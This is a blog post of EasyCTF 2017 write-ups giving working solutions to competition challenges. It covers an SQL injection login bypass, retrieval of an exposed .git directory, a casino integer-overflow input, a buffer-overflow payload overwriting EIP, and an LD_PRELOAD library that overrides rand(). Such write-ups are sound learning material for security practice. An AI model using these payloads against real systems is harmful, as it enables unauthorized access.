jtwp470's blog

読者です 読者をやめる 読者になる 読者になる

jtwp470’s blog

日記とかプヨグヤミングとか

EasyCTF 2017 Writeup

Hi, I am @jtwp470. I took part in EasyCTF 2017. This article is write-ups for the CTF.

Our team earned 2985 pts and I did 1080 pts.

https://www.easyctf.com/www.easyctf.com

[Web 100] SQL Injection 1

Easy SQLi. Input admin';-- at the form.

Flag: easyctf{a_prepared_statement_a_day_keeps_the_d0ctor_away!}

[Web 100] Edge 1

This problem is required for a little guessing skill.

When you access http://edge1.web.easyctf.com/.git/, you can see the internal git directory. And then I have downloaded the internal .git repository.

Flag: easyctf{w3_ev3n_u53_git}

[Web 200] Edge 2

This problem is very similar to Edge 1.

Flag: easyctf{hiding_the_problem_doesn't_mean_it's_gone!}

[Web 260] Web Tunnel

If you scan the first QR code, you can get bl9BimiQOpw99yAYFbbD. And then I guessed that it is the next QR file name.

I have written a script since it is hard to get it by hand.

#!/usr/bin/env python3
import subprocess
import os.path
import requests



URL = "http://tunnel.web.easyctf.com/images/{}"


def read_qr(image=None):
    if image is None:
        image = "DaicO7460493nYSuvLPW.png"

    p = subprocess.Popen(
        ['zbarimg', '-q', os.path.join("image", image)],
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        shell=False,
    )

    stdout, stderr = p.communicate()

    if len(stderr) != 0:
        raise RuntimeError('Zbar throw error')
    return stdout.decode('utf-8').split(":")[1].strip()


def save_qr(image=None):
    if image is None:
        image = "DaicO7460493nYSuvLPW.png"

    print("Downloading... {}".format(image))
    r = requests.get(URL.format(image), stream=True)
    if r.status_code == 200:
        with open(os.path.join("image", image), 'wb') as f:
            for chunk in r:
                f.write(chunk)


if __name__ == "__main__":
    save_qr()
    image = "{}.png".format(read_qr())
    while True:
        save_qr(image)
        image = "{}.png".format(read_qr(image))

Flag: easyctf{y0u_sh0uld_b3_t1r3d_tr4v3ll1ng_all_th1s_w4y!!!!!}

[Binary Exploitation 100] Risky Business

This is a casino and there is a negative overflow bug. I understand that you need to earn 2 billon dollars to get the flag.

$ python -c 'print("99999999\n" * 10000)' | ./casino 
Welcome to the EasyCTF 2017 Casino                                                                                                                                                             
Try your luck and gain access to our exclusive club!                                                                                                                                           
                                                                                                                                                                                               
Your net worth is: $100000                                                                                                                                                                     
Please enter how much you would like to bet:                                                                                                                                                   
Sorry, I'm afraid you've lost :(                                                                                                                                                               
                                                                                                                                                                                               
Your net worth is: $-99899999                                                                                                                                                                  
… 
                                                                                                                                                                                               
Your net worth is: $2095067318                                                                                                                                                                 
Welcome to our exclusive club!                                                                                                                                                                 
Here's our special flag: easyctf{m4by3_w3_c0u1d_h4v3_d0n3_th47_b3t7er}                                                                                                                         
Traceback (most recent call last):                                                                                                                                                             
  File "<string>", line 1, in <module>                                                                                                                                                         
IOError: [Errno 32] Broken pipe                                                                                                                                                                
user42884@easyctf:/problems/casino$ 

Flag: easyctf{m4by3_w3_c0u1d_h4v3_d0n3_th47_b3t7er}

[Binary Exploitation 120] Simple Rop

I overwrote the EIP and got a flag since there was a simple overflow bug.

$ python -c "print('A' * 76 + '\x1a\x85\x04\x08')" | ./simple-rop

Flag: easyctf{r0p_7o_v1ct0ry}

[Reverse Engineering 200] Lucky Guess

We should guess the number to generate from rand function.

I use LD_PRELOAD to overwrite rand.

//  cc -o inject.so inject.c -shared -fPIC
int rand(void) {
  return 1;
}

This rand function always returns 1.

So, I injected it.

$ echo 1 | LD_PRELOAD=./inject.so ./guess
Guess? easyctf{aaA_tOucH_0f_luccK_47ca4e}

Flag: easyctf{aaA_tOucH_0f_luccK_47ca4e}

This CTF is very fun. Other writeups: https://writeups.easyctf.com/

広告を非表示にする